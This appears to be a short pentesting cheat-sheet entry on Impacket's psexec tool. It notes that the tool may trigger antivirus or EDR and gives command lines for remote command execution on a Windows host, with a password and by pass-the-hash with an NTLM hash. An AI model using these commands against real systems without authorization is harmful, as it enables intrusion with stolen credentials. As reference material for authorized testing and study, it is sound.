#
Impacket toolsuite
#
impacket-psexec
Very similar to the Microsoft Sysinternals tool. Instead of uploading psexecsv service binary, it uploads a service binary with a randome name. May be flagged with AV or EDR.
Running python psexec with credentials:
impacket-psexec user:password@10.10.10.10
Running python psexec with passing the hash:
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c user@10.10.10.10 cmd.exe